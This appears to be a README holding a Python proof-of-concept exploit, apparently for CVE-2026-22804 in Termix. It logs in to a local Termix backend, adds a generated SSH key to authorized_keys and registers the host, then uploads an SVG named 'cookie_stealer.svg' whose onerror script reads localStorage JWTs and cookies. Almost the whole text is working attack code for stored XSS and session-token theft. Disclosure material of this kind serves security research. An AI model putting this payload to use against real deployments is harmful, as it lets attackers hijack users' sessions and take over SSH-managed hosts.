README.md
Rendering markdown...
import requests
import json
import base64
import time
import sys
import argparse
import os
import subprocess
BASE_URL_AUTH = "http://localhost:30001"
BASE_URL_FILE = "http://localhost:30004"
def parse_args():
parser = argparse.ArgumentParser(description="Termix XSS Exploit")
parser.add_argument("--user", default="admin", help="Username for Termix auth")
parser.add_argument("--pass", dest="password", default="password123", help="Password for Termix auth")
return parser.parse_args()
def login_or_register(username, password):
session = requests.Session()
try:
print(f"[*] Attempting to login as {username}...")
res = session.post(f"{BASE_URL_AUTH}/users/login", json={
"username": username,
"password": password
})
if res.status_code == 200:
print("[+] Login successful")
token = res.json().get("token")
session.headers.update({"Authorization": f"Bearer {token}"})
return session, res.json().get("userId")
print("[-] Login failed, attempting registration...")
except requests.exceptions.ConnectionError:
print(f"[!] Could not connect to {BASE_URL_AUTH}. Is the backend running?")
sys.exit(1)
try:
res = session.post(f"{BASE_URL_AUTH}/users/create", json={
"username": username,
"password": password
})
if res.status_code == 201 or res.status_code == 200:
print("[+] Registration successful")
res = session.post(f"{BASE_URL_AUTH}/users/login", json={
"username": username,
"password": password
})
token = res.json().get("token")
session.headers.update({"Authorization": f"Bearer {token}"})
return session, res.json().get("userId")
else:
print(f"[!] Registration failed: {res.text}")
sys.exit(1)
except Exception as e:
print(f"[!] Error: {e}")
sys.exit(1)
def get_or_create_host(session, user_id):
print("[*] getting SSH hosts...")
res = session.get(f"{BASE_URL_AUTH}/ssh/db/host")
if res.status_code != 200:
print(f"[-] Failed to get hosts. Status: {res.status_code}, Body: {res.text}")
return None
try:
hosts = res.json()
except json.JSONDecodeError:
print(f"[-] JSON Decode Error. Body: {res.text}")
sys.exit(1)
target_host_name = "Localhost PoC Custom"
if hosts:
for host in hosts:
if host['name'] == target_host_name:
print(f"[+] Found existing custom host: {host['name']}. Deleting to ensure clean state...")
del_res = session.delete(f"{BASE_URL_AUTH}/ssh/db/host/{host['id']}")
if del_res.status_code != 200:
print(f"[-] Failed to delete host: {del_res.status_code}")
break
print("[*] Custom host not found. Creating it...")
key_path = "/home/kali/CVE-2026-22804/poc_key"
if not os.path.exists(key_path):
print(f"[*] generating ssh key: {key_path}")
subprocess.run(["ssh-keygen", "-f", key_path, "-t", "rsa", "-N", ""])
pub_key_path = f"{key_path}.pub"
auth_keys_path = os.path.expanduser("~/.ssh/authorized_keys")
if os.path.exists(pub_key_path):
with open(pub_key_path, "r") as f:
pub_key = f.read().strip()
os.makedirs(os.path.dirname(auth_keys_path), exist_ok=True)
current_keys = ""
if os.path.exists(auth_keys_path):
with open(auth_keys_path, "r") as f:
current_keys = f.read()
if pub_key not in current_keys:
print("[*] Adding generated key to authorized_keys...")
with open(auth_keys_path, "a") as f:
f.write(f"\n{pub_key}\n")
host_data = {
"userId": user_id,
"name": target_host_name,
"ip": "127.0.0.1",
"port": 22,
"username": "kali",
"authType": "key",
"key": open("/home/kali/CVE-2026-22804/poc_key").read(),
"tags": ["poc"],
"pin": 0,
"enableTerminal": 1,
"enableFileManager": 1,
"enableTunnel": 0,
"forceKeyboardInteractive": False
}
res = session.post(f"{BASE_URL_AUTH}/ssh/db/host", json=host_data)
if res.status_code == 200 or res.status_code == 201:
print("[+] Created localhost host.")
return res.json()
else:
print(f"[!] Failed to create host: {res.status_code} {res.text}")
sys.exit(1)
def connect_ssh(session, host):
print(f"[*] Connecting to {host['name']} ({host['ip']})...")
host_id = host['id']
session_id = str(host_id)
payload = {
"sessionId": session_id,
"hostId": host_id,
"ip": host['ip'],
"port": host['port'],
"username": host['username'],
"authType": host['authType'],
"userId": host.get('userId')
}
if host.get('key'):
payload['sshKey'] = host['key']
if host.get('authType') == 'password':
payload['password'] = host.get('password', 'kali')
try:
res = session.post(f"{BASE_URL_FILE}/ssh/file_manager/ssh/connect", json=payload)
if res.status_code == 200 or res.status_code == 201:
print(f"[+] SSH Connection initiated. Response: {res.text}")
time.sleep(2)
status_res = session.get(f"{BASE_URL_FILE}/ssh/file_manager/ssh/status", params={"sessionId": session_id})
print(f"[*] Status Check: {status_res.status_code} {status_res.text}")
if status_res.status_code == 200 and status_res.json().get("connected"):
print("[+] SSH Connected successfully!")
return session_id
else:
print("[-] SSH Connection status is false. Maybe auth failed?")
print(f"DEBUG: Session ID used: {session_id}")
return None
else:
print(f"[-] Connect failed: {res.status_code} {res.text}")
except Exception as e:
print(f"[!] Connection error: {e}")
return session_id
def upload_poc(session, session_id, host_id, user_id):
filename = "cookie_stealer.svg"
content = """<svg width="600" height="600" xmlns="http://www.w3.org/2000/svg">
<foreignObject width="100%" height="100%">
<body xmlns="http://www.w3.org/1999/xhtml">
<div style="background-color:purple; color:white; font-size:24px; padding:20px; font-weight:bold; border: 5px solid black; font-family:monospace; overflow:hidden;">
SESSION HIJACKED! <br/>
<hr/>
<div style="font-size:16px;">
<strong>JWT (localStorage):</strong><br/>
<textarea id="jwt_area" style="width:100%; height:100px; color:black;">Loading...</textarea>
<br/>
<strong>Cookies:</strong><br/>
<textarea id="cookie_area" style="width:100%; height:50px; color:black;">Loading...</textarea>
</div>
</div>
<img src="x" onerror="
try {
let store = '';
for(let i=0; i<localStorage.length; i++) {
store += localStorage.key(i) + ': ' + localStorage.getItem(localStorage.key(i)) + '\\n';
}
document.getElementById('jwt_area').value = store || 'No localStorage found';
document.getElementById('cookie_area').value = document.cookie || 'No cookies found';
alert('Session Hijacking Successful!');
} catch(e) { alert('Error: ' + e); }
" style="display:none;" />
</body>
</foreignObject>
</svg>"""
payload = {
"sessionId": session_id,
"path": "/home/kali",
"fileName": filename,
"content": content,
"hostId": host_id,
"userId": user_id
}
print(f"[*] Uploading {filename}...")
res = session.post(f"{BASE_URL_FILE}/ssh/file_manager/ssh/uploadFile", json=payload)
if res.status_code == 200:
print(f"[+] File uploaded successfully!")
print(f"[+] Check File Manager at /home/kali/{filename} to verify XSS.")
else:
print(f"[-] Upload failed: {res.status_code} {res.text}")
def main():
args = parse_args()
session, user_id = login_or_register(args.user, args.password)
host = get_or_create_host(session, user_id)
session_id = connect_ssh(session, host)
if session_id:
upload_poc(session, session_id, host['id'], user_id)
if __name__ == "__main__":
main()